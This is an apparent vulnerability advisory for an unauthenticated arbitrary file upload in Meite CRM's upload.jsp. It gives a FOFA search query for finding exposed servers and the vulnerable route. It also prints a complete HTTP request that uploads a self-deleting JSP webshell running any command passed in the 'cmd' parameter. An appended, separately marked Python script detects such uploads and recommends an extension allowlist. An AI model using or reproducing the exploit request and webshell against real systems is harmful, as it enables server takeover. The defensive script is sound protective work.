Babing
Published on 2024-08-30

B1-5 Meite (美特) CRM Arbitrary File Upload

Vulnerability description:

The upload.jsp interface of Meite (美特) CRM has a file upload vulnerability. An unauthenticated remote attacker can exploit it to upload a malicious backdoor file and execute arbitrary commands, thereby gaining control of the server.

Website screenshot: [image]

FOFA query:

body="/common/scripts/basic.js"

Vulnerability reproduction:

Vulnerable route: http://your-ip//develop/systparam/softlogo/file2.jsp
Payload:

Screenshot: [image]
If the file upload form is shown, the vulnerability is present.

Upload a webshell, click submit, and capture the request.
Payload:

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null& HTTP/1.1
Host: your-ip
Content-Length: 995
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="rce.jsp"
Content-Type: application/octet-stream

<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Screenshot: [image]
The response body echoes the full path of the uploaded file.
Screenshot: [image]
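As an added defender-side example (not code from the original post or from the vendor), the following Python flags captured requests to the upload endpoint above whose uploaded filename carries a servlet-executable extension, and treats any non-image name as suspicious since the endpoint is meant for a logo. The sample requests, the host name and the image allowlist are constructed assumptions.

```python
import re

# Endpoint named in the write-up; a logo upload should only ever store raster images.
UPLOAD_PATH = "/develop/systparam/softlogo/upload.jsp"
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}            # assumption: what a logo handler should accept
EXECUTABLE_EXT = {"jsp", "jspx", "jspf", "jsw", "jsv"}  # served as code by a servlet container

def upload_filenames(raw: bytes):
    """Return (request path, list of uploaded filenames) from a raw multipart POST."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, target = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ")[:2]
    m = re.search(rb"boundary=([^\r\n;]+)", head)
    names = []
    if method == "POST" and m:
        for part in body.split(b"--" + m.group(1).strip()):
            fm = re.search(rb'filename="([^"]*)"', part)
            if fm:
                names.append(fm.group(1).decode("latin-1"))
    return target.split("?", 1)[0], names

def classify(raw: bytes) -> str:
    """'block' if any uploaded name would be executed by the container, 'suspicious'
    if it is not an image, 'ok' otherwise (or if the request is not for the endpoint)."""
    path, names = upload_filenames(raw)
    if path != UPLOAD_PATH or not names:
        return "ok"
    verdict = "ok"
    for name in names:
        exts = name.lower().split(".")[1:]          # every extension, so x.jsp.png is still caught
        if any(e in EXECUTABLE_EXT for e in exts):
            return "block"
        if not exts or exts[-1] not in ALLOWED_EXT:
            verdict = "suspicious"
    return verdict

def build_request(filename: str) -> bytes:
    """Constructed sample with the shape of the write-up's request; host and body are placeholders."""
    b = b"----WebKitFormBoundaryEXAMPLE"
    part = lambda h, v: b"--" + b + b"\r\nContent-Disposition: form-data; " + h + b"\r\n\r\n" + v + b"\r\n"
    body = (part(b'name="file"; filename="' + filename.encode() + b'"\r\nContent-Type: application/octet-stream',
                 b"placeholder-bytes")
            + part(b'name="key"', b"null") + b"--" + b + b"--\r\n")
    return (b"POST " + UPLOAD_PATH.encode() + b"?key=null&form=null HTTP/1.1\r\n"
            b"Host: crm.example.internal\r\nContent-Type: multipart/form-data; boundary=" + b
            + b"\r\n\r\n" + body)

SAMPLE_JSP = build_request("rce.jsp")        # same filename as the write-up, harmless body
SAMPLE_PNG = build_request("logo.png")
SAMPLE_DOUBLE = build_request("logo.jsp.png")

if __name__ == "__main__":
    for s in (SAMPLE_JSP, SAMPLE_PNG, SAMPLE_DOUBLE):
        print(upload_filenames(s)[1], classify(s))
```

The same allowlist check belongs in the upload handler itself: the fix is to store only image extensions, and never under a path the container serves as JSP.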